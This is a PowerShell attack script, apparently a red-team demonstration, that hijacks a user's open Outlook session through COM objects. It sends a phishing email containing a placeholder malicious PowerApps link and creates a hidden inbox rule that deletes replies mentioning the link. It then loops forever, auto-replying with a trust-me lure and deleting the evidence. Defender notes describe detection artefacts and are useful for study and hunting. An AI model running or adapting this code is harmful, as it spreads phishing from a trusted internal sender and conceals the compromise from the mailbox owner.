Hijack_Outlook_w_COM_Objects.ps1
# Description:
# This script interacts with the open Outlook client through COM objects
# (Outlook.Application) to send an email and create a mail rule, then polls
# Deleted Items and auto-replies to matching messages (see MAIN).
# It is a demonstration of post-compromise mailbox abuse: every action runs inside
# the signed-in user's Outlook session, so no password or token is handled here.
# Defender notes:
#   - The observable artefacts are a PowerShell process instantiating the
#     Outlook.Application COM class, a new receive rule with a Delete action,
#     and outbound mail/replies the mailbox owner did not write.
#   - PowerShell script block logging (event ID 4104) records the script text,
#     including the New-Object -ComObject call, when it is enabled.
# Variables
# Recipient of the initial message.
# NOTE(review): "[email protected]" looks like an address redacted by the hosting
# page rather than the author's original value - confirm against the original file.
$to = "[email protected]"
#####
##### OUTLOOK COM Functions
#####
function Send-Email($outlook, $to, $subject, $body) {
# Sends one plain-text message from the Outlook profile behind $outlook.
# Parameters:
#   $outlook - Outlook.Application COM object
#   $to      - recipient string, assigned to MailItem.To
#   $subject - subject line
#   $body    - plain-text body, assigned to MailItem.Body
# Output: a status line via Write-Host.
# Defender notes:
#   - The message leaves the user's own mailbox, so recipients and mail filtering
#     see a legitimate internal sender; sender-authentication checks do not help here.
#   - NOTE(review): Outlook's programmatic-access protection (Trust Center) may warn
#     on or block automated Send() calls depending on policy and antivirus state -
#     confirm how it is configured on managed endpoints.
#   - Presumably a copy is kept in Sent Items as for any sent mail; nothing in this
#     function removes it - verify during triage.
# create Outlook MailItem named Mail using CreateItem() method (0 = olMailItem)
$Mail = $outlook.CreateItem(0)
# add properties as desired; the [string] casts coerce whatever was passed in
$Mail.To = [string]$to
$Mail.Subject = [string]$subject
$Mail.Body = [string]$body
# send message
$Mail.Send()
write-host "[+] Sent Outlook Email to $to"
}
function Add-Rule($outlook, $rule_name, $bodyOrSubjectText) {
# Creates a receive rule in the default store that deletes any incoming message
# whose subject or body contains $bodyOrSubjectText.
# Parameters:
#   $outlook           - Outlook.Application COM object
#   $rule_name         - display name of the rule; also used for the duplicate check
#   $bodyOrSubjectText - text the rule's BodyOrSubject condition matches on
# Output: a status line via Write-Host; returns early if the name already exists.
# Defender notes:
#   - The effect is that replies or warnings mentioning the text never show up in
#     the Inbox, so the mailbox owner does not notice them.
#   - Reviewing inbox rules for delete/move actions keyed on URLs or security-related
#     words is a standard step when investigating a suspected mailbox compromise.
#   - NOTE(review): on Exchange Online, rule changes made from the Outlook client are
#     typically recorded in the audit log (e.g. the UpdateInboxRules operation) when
#     mailbox auditing is on - confirm for the tenant.
# Get the Outlook namespace
$Namespace = $Outlook.GetNamespace("MAPI")
# Get a list of all of the Outlook rules
$Rules = $Namespace.DefaultStore.GetRules()
# Skip creation when a rule with this name is already present.
# NOTE(review): with exactly one existing rule, .Name is a single string and
# Contains() is then a substring test rather than an exact-name comparison.
If ($Rules.Count -gt 0 -and ($rules | select Name).Name.Contains($rule_name)) {
write-host "[!] Mail rule with that name already exists, skipping"
return
}
# Create the rule object; it is not persisted until $Rules.Save() below
$Rule = $Rules.create(
[string]$rule_name, # The name of the rule
0 # [Microsoft.Office.Interop.Outlook.OlRuleType]::olRuleReceive - the rule targets received emails. https://learn.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.olruletype?view=outlook-pia
)
# Configure the condition: match the given text in the subject or the body
$Condition = $Rule.Conditions.BodyOrSubject
$Condition.Enabled = $true
$condition.text = @($bodyOrSubjectText)
# send item to deleted folder
$Action = $Rule.Actions.Delete
$Action.Enabled = $True
# Now save everything
$Rules.Save()
write-host "[+] Created new malicious mail rule to route $bodyOrSubjectText to Deleted Items folder"
}
function Invoke-RespondToDeletedEmails($outlook, $bodyOrSubjectText = "this_string_should_not_be_in_an_email", $reply_body) {
# Scans the Deleted Items folder once and, for every item whose subject or body
# contains $bodyOrSubjectText, marks it read, sends a reply and deletes the item.
# Parameters:
#   $outlook           - Outlook.Application COM object
#   $bodyOrSubjectText - text to look for; the default is a string that is not
#                        expected to appear in any real message
#   $reply_body        - HTML assigned to the reply's HTMLBody (replaces the
#                        content Reply() generated)
# Output: one Write-Output line per matching item.
# Defender notes:
#   - Paired with a delete rule on the same text, this answers people who reply to
#     the original message without the mailbox owner seeing either side in the Inbox.
#   - NOTE(review): Delete() on an item that already sits in Deleted Items presumably
#     removes it from the visible folder; on Exchange it may still be recoverable
#     from Recoverable Items - confirm when collecting evidence.
#   - The automated replies are outbound mail from the user's mailbox; look for them
#     in Sent Items and in message trace rather than in the Inbox.
# Get the MAPI namespace
$namespace = $outlook.GetNamespace("MAPI")
# https://learn.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.oldefaultfolders?view=outlook-pia
$deletedItemsFolder = $namespace.GetDefaultFolder(3) # [Microsoft.Office.Interop.Outlook.OlDefaultFolders]::olFolderDeletedItems)
$emails = $deletedItemsFolder.Items
foreach ($email in $emails) {
If (
$email.subject.Contains($bodyOrSubjectText) -or $email.body.Contains($bodyOrSubjectText)
) {
Write-Output "Found Email! Sending reply and deleting.`n(Subject): $($email.Subject)" # - $($email.body)"
# mark as read so the item does not stand out as unread in Deleted Items
$email.UnRead = $false
# NOTE(review): $sent_from is assigned but never used in this function
$sent_from = $email.sender.Address
$reply = $email.Reply()
$reply.HTMLBody = $reply_body
$reply.Send()
# delete email
$email.Delete()
}
}
}
#### ^ END FUNCTIONS ^
##################
#### MAIN
##################
##### Stage 2: MALICIOUS Outlook Actions (Technique: COM Objects)
# Flow: get the Outlook COM object, print whose mailbox is in use, send the
# lure email, create the delete rule for replies, then poll Deleted Items forever.
# Defender notes:
#   - Everything below runs in the interactive user's session against their Outlook
#     profile; the process to look for is PowerShell holding an Outlook.Application
#     COM reference and running indefinitely.
#   - The rule name and URL are hard-coded demo values; hunt on the behaviour
#     (receive rule with a Delete action, followed by automated replies), not on
#     these literal strings.
# create COM object named Outlook
# Add-Type -AssemblyName Microsoft.Office.Interop.Outlook
# [Reflection.Assembly]::LoadWithPartialname("Microsoft.Office.Interop.Outlook")
$outlook = New-Object -ComObject Outlook.Application
# Banner: resolves and prints the primary SMTP address of the profile's current user
write-host "[+] Interacting with Outlook as user (COM Objects): $($outlook.Session.CurrentUser.AddressEntry.GetExchangeUser().PrimarySmtpAddress)"
# Reference used for the mail rule creation further down:
# https://davejlong.com/scripting-office-with-powershell-creating-outlook-rules/
# send phishing email
$malicious_powerapp_url = "https://powerapps.com/mybadapp" # $new_app.powerapp_phish_url
Send-Email -outlook $outlook -to $to -subject "Please review: $malicious_powerapp_url" -body "Can you please take a look at this, what do you think? $malicious_powerapp_url"
# Create mail rule: any received message mentioning the URL goes to Deleted Items
Add-Rule -outlook $outlook -rule_name "Malicious Rule: Route powerapp email to trash" -bodyOrSubjectText $malicious_powerapp_url
### FINAL LOOP
write-host "DONE! Looping Outlook / Teams Actions"
# Runs until the process is stopped; one pass over Deleted Items per second
while ($true) {
# outlook, check emails + respond to deleted emails
# in a real attack scenario a C2 server may be used for a more convincing phish
Invoke-RespondToDeletedEmails -outlook $outlook -bodyOrSubjectText $malicious_powerapp_url -reply_body "It's totally cool, we are co-workers. Trust. $malicious_powerapp_url"
start-sleep 1
}